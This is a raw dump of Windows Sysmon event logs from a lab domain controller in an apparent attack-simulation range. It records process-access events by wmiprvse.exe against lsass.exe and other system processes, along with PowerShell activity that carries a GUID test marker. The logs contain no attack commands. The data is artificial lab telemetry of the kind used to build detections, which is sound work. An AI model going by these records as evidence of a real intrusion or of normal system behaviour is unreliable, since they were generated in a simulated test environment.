16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002240069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:03.075{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436\PSHost.132591776429601515.14436.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002240068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6DAB-603E-B6AA-00000000AD01}1335615692C:\Windows\system32\conhost.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.070{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-B6AA-00000000AD01}13356C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002240057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.069{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fu5byzav.nzh.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.067{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5gf3rkk3.0v5.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.067{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.065{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.065{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.065{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.065{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.064{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.064{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002240048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.064{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -Co Write-Host ee3e885d-d22d-43cb-b4b5-384480757a35C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002240047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.045{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5gf3rkk3.0v5.ps12021-03-02 16:54:03.045 10341000x80000000000000002240046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAA-603E-B3AA-00000000AD01}10880C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 